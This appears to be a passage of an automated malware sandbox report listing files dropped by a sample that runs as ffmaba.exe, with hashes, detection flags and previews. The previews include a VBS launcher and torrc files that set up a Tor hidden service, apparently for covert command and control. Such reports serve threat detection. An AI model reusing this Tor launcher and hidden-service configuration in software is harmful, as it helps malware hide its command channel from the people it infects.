                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):4229632
                                                                          Entropy (8bit):6.429803829212971
                                                                          Encrypted:false
                                                                          SSDEEP:98304:7zI+VNHtad8rAiCQDE+KOzG5En1QIonPrW29hKX:H1HtadtPQDEfEn1QIbM
                                                                          MD5:07244A2C002FFDF1986B454429EACE0B
                                                                          SHA1:D7CD121CAAC2F5989AA68A052F638F82D4566328
                                                                          SHA-256:E9522E6912A0124C0A8C9FF9BB3712B474971376A4EB4CA614BB1664A2B4ABCF
                                                                          SHA-512:4A09DB85202723A73703C5926921FEF60C3DDDAE21528A01936987306C5E7937463F94A2F4A922811DE1F76621DEF2A8A597A8B38A719DD24E6FF3D4E07492CA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................0...@..^............0...@..........................@A.......A...@... ...............................>..5...........................@?.4............................B;.....................,.>.(............................text....0.......0.................`.P`.data........0.......0.............@.`..rdata.......`1......J1.............@.`@.bss.....]....>.......................`..idata...5....>..6...\>.............@.0..CRT....4.... ?.......>.............@.0..tls.........0?.......>.............@.0..reloc..4....@?.......>.............@.0B................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor.vbs

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):172
                                                                          Entropy (8bit):4.939646411880318
                                                                          Encrypted:false
                                                                          SSDEEP:3:jaPFEm8nByK2qQZnmRdZj4I5xKpRZxHFmGZj4I5xKpRWSsjv20FaPOUC:j6NqEK2dnmR5+Rl5+RBsjv2KUC
                                                                          MD5:DF39E5BEB63BA0DC6A84E29591BFAAA8
                                                                          SHA1:63EFC259EB67D150FAD9699250E383B773144E36
                                                                          SHA-256:FA5B02AD4EF3C6C290883A3173E53C46B024F7928835B1B53916260B156EE602
                                                                          SHA-512:4C649E2AD35AD7119B124C8D5F78E9194E5DC4AE53DC0FFFE773A28C31C6145A1A7AD2D24B3ACE1368EF1165E7CECB701D14A873263F8DDBAEB478A345C743F7
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:Set WshShell = CreateObject("WScript.Shell") ..WshShell.Run("""C:\Program Files (x86)\Tor\tor-real.exe"" -f ""C:\Program Files (x86)\Tor\torrc"""),1..Set WshShell = Nothing

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):132
                                                                          Entropy (8bit):4.979194871191635
                                                                          Encrypted:false
                                                                          SSDEEP:3:V9cbKCj4I5xKpCBj3ZVcbKCj4I5xKpCbvtGIRzIWQnhNiFX:0R5+QncR5+SFHRE3hNiFX
                                                                          MD5:1EF93CDA02A0C4AD92978542D2BCCCA9
                                                                          SHA1:2147257895E77B7DB0E040118E3D025ECE791212
                                                                          SHA-256:422CDB7373F4A7A568FF9EE7147A0B0E608066A573CA6A7531D2BD1B40844811
                                                                          SHA-512:8554B4306CBD0960CBE6CF720A4EDCC50B6AF5FDE08E44160BFBC411F3C0BCFD239FAEF3C1EC913C24A286C01ED4EEB88C8D25B3B3781A7B9D7F4ED6FB92AF65
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:GeoIPFile C:\Program Files (x86)\Tor\geoip..GeoIPv6File C:\Program Files (x86)\Tor\geoip6..SocksPort localhost:9050..#ExitNodes {us}

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):228
                                                                          Entropy (8bit):4.951833307481278
                                                                          Encrypted:false
                                                                          SSDEEP:6:CMR3vAiI923SyypBEiqnTNu5P923SyypNKOunTy9unTMvv:CQ3YEtypyiH54typjL
                                                                          MD5:9CC2AD4256EEC5414906C439665F6A37
                                                                          SHA1:CAAF6CD84BC3535616A009D33D443598AE986561
                                                                          SHA-256:C412382BCDADA2048B770C31672E861967299B5DDA7A9A4362B4BAD407B3BC89
                                                                          SHA-512:8311ADF368D08DBD1DA1AE6968BB5F822BB7C1EC47A1FC706F9F01665841DDC120934264B34A6DFE34E4A4FA04F59674AA05E1C767765C5C7B3E657D2821B806
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:SOCKSPort 2790..ControlPort 2791..DataDirectory C:\Users\user\AppData\Local\77rh3rhsc7\tor\data..HiddenServiceDir C:\Users\user\AppData\Local\77rh3rhsc7\tor\host..HiddenServicePort 80 127.0.0.1:2789..HiddenServiceVersion 3..

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\zlib1.dll

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):124416
                                                                          Entropy (8bit):6.479923939252401
                                                                          Encrypted:false
                                                                          SSDEEP:3072:HW7e1dL7Om0iXQmWfBoUSIgTBfHJNj9jjjjjjKeDEcz:HWCdLd4fBoUSIgTBxNj9jjjjjjKeDEc
                                                                          MD5:6F98DA9E33CD6F3DD60950413D3638AC
                                                                          SHA1:E630BDF8CEBC165AA81464FF20C1D55272D05675
                                                                          SHA-256:219D9D5BF0DE4C2251439C89DD5F2959EE582E7F9F7D5FF66A29C88753A3A773
                                                                          SHA-512:2983FAAF7F47A8F79A38122AA617E65E7DEDDD19BA9A98B62ACF17B48E5308099B852F21AAF8CA6FE11E2CC76C36EED7FFA3307877D4E67B1659FE6E4475205C
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...#.r.........................c.........................`.......3....@... .........................|............@.......................P..............................d.......................@................................text...tp.......r..................`.P`.data...H............v..............@.0..rdata...O.......P...x..............@.`@.bss..................................`..edata..|...........................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.........0......................@.0..rsrc........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ffmaba.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\ffmaba.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1433
                                                                          Entropy (8bit):5.341418830574733
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84qpsXE4qdKm:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HA
                                                                          MD5:F30AB993BAB25C1E42ED5545A67CD464
                                                                          SHA1:CE2526AA315AAC8E1569ECDF6AF450A1062B4225
                                                                          SHA-256:E7C5888083E14FC76A59FBAD2DA592446F6BDEC7DE18118B9A5658FBEB4A9B49
                                                                          SHA-512:59887E6ED6C67D36207DF995259A044E809296A5BD78B82DD3B00CB13D0811C3FEE021C763220572711005DECA576E3E1D65C79017AA07902C59EE1B536C46C9
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yt7dW9nyJK.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\yt7dW9nyJK.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1216
                                                                          Entropy (8bit):5.34331486778365
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                          Malicious:true
                                                                          Reputation:unknown
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):2232
                                                                          Entropy (8bit):5.37966389835059
                                                                          Encrypted:false
                                                                          SSDEEP:48:6WSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:6LHxvCsIfA2KRHmOugw1s
                                                                          MD5:687D6440F7E1633CD0EFEEC836AB3BE3
                                                                          SHA1:0518ECC6200654B85E2A8567A6B451F39DBB4280
                                                                          SHA-256:D6281187F98CE3C9BA99BD54CE833B8B01C2DE2A7FBB40089D462F2AB3FB1C40
                                                                          SHA-512:D05E8ED5D774AE49169D38AD65E66C0014508F5A230E163A4529C80A6867A9AD474A6FB327515B3FE3318C4BEC1C8818AB39208BD229615B3C23517BCCE7AE41
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                          C:\Users\user\AppData\Local\Starlabs\ffmaba.exe

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\ffmaba.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):511496
                                                                          Entropy (8bit):7.963050096245282
                                                                          Encrypted:false
                                                                          SSDEEP:12288:JSoFwZbQp5MKHYRAnRx8S18Bjbgot1C2kR:coFzaeJX8Rt1O
                                                                          MD5:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          SHA1:314B707CE3A9043E2C219B6F1DE883C572089EA8
                                                                          SHA-256:459C1822B23497D81044D18CE0936F876B37A478CE847140EC69A8DD58C0A1E8
                                                                          SHA-512:F487E7EEE98B3B97E43C7C9759BC50D2341AB5622AF80ED4A06ED32FEE9A221BA1E968E95213B2B44FB5D72B1AF618B7B1BA0A77BE81CB2A65FF99979D7C2ED1
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 46%
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0..|.............. ........@.. ....................................@.................................t...O........................6........................................................... ............... ..H............text....x... ...|.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vzidghc.2bo.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10rpa0bt.dkd.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2azbi2s3.4qv.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ntiddy0.31e.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fkzvqki.fxm.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40ktdn3n.ckf.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qpvytti.coy.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azpums4v.sv1.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ca2jurgy.glb.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cilcvib5.zor.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cjkjqjlg.bnv.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctqykilo.cyc.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxsb4ggp.fvl.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dquy3ezh.yuf.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_elt4ncus.rgi.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

